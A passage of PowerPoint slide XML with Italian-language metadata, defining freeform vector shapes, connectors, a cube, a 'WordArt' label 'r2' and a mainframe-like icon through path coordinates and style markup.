                    <a:gd name="T15" fmla="*/ 97 h 12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93" h="125">
                      <a:moveTo>
                        <a:pt x="0" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="42"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="70"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="342" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="97"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9269" name="Freeform 234">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2F24F64-F89E-C307-C6A6-193584E28275}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3028" y="2348"/>
                  <a:ext cx="393" cy="132"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 28 h 132"/>
                    <a:gd name="T2" fmla="*/ 305 w 393"/>
                    <a:gd name="T3" fmla="*/ 0 h 132"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 83 h 132"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 55 h 132"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 132 h 132"/>
                    <a:gd name="T10" fmla="*/ 305 w 393"/>
                    <a:gd name="T11" fmla="*/ 132 h 132"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 104 h 132"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 28 h 13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93" h="132">
                      <a:moveTo>
                        <a:pt x="393" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="305" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="83"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="55"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="28"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9270" name="Freeform 236">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DE2E85F-E891-E64F-E71E-A904D19E0383}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3050" y="2194"/>
                  <a:ext cx="392" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 392"/>
                    <a:gd name="T1" fmla="*/ 28 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 392"/>
                    <a:gd name="T3" fmla="*/ 0 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 392"/>
                    <a:gd name="T5" fmla="*/ 77 h 125"/>
                    <a:gd name="T6" fmla="*/ 392 w 392"/>
                    <a:gd name="T7" fmla="*/ 56 h 125"/>
                    <a:gd name="T8" fmla="*/ 341 w 392"/>
                    <a:gd name="T9" fmla="*/ 125 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 392"/>
                    <a:gd name="T11" fmla="*/ 125 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 392"/>
                    <a:gd name="T13" fmla="*/ 104 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 392"/>
                    <a:gd name="T15" fmla="*/ 28 h 12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92" h="125">
                      <a:moveTo>
                        <a:pt x="0" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="392" y="56"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="341" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="28"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9271" name="Freeform 238">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67217FCD-89DA-1F98-9B3A-9FE6FAC025BE}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3442" y="2361"/>
                  <a:ext cx="393" cy="124"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 124"/>
                    <a:gd name="T2" fmla="*/ 306 w 393"/>
                    <a:gd name="T3" fmla="*/ 124 h 124"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 41 h 124"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 69 h 124"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 124"/>
                    <a:gd name="T10" fmla="*/ 306 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 124"/>
                    <a:gd name="T12" fmla="*/ 197 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 124"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 97 h 12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93" h="124">
                      <a:moveTo>
                        <a:pt x="393" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="306" y="124"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="306" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="197" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="97"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9265" name="WordArt 249">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50325560-945A-7101-E89F-CABD34E8BB8E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2881" y="428"/>
              <a:ext cx="346" cy="103"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textCanDown">
                <a:avLst>
                  <a:gd name="adj" fmla="val 33333"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="it-IT" sz="1400" kern="10" dirty="0">
                  <a:ln w="9525">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>r2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9272" name="Connettore diritto 9271">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F49ECF16-691D-A72A-3108-0BDC78FAEB1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2670433" y="3667061"/>
            <a:ext cx="248187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74" name="Connettore diritto 9273">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C5E6C1F-061B-BA9B-96E7-748866FD810C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="41" idx="5"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2788398" y="4164547"/>
            <a:ext cx="2388820" cy="15436"/>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278" name="Gruppo 9277">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9C81F03-65DC-CB4D-B459-3C49FB6A9F7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2180000" y="3348604"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9279" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68565139-00C1-BFD4-74F2-CFAFB5EE91AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4306849"/>
              <a:ext cx="378624" cy="350441"/>
            </a:xfrm>
            <a:prstGeom prst="cube">
              <a:avLst>
                <a:gd name="adj" fmla="val 15116"/>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endParaRPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9280" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3DA903A-D9B6-2050-D677-D22BD37F2990}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4360763"/>
              <a:ext cx="324710" cy="296527"/>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 name="T24" fmla="*/ 326 w 21600"/>
                <a:gd name="T25" fmla="*/ 22180 h 21600"/>
                <a:gd name="T26" fmla="*/ 21559 w 21600"/>
                <a:gd name="T27" fmla="*/ 27893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extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="21600" y="10885"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10634" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10800" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="10885"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1163" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16449" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="2381"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2160" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1994" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1994" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
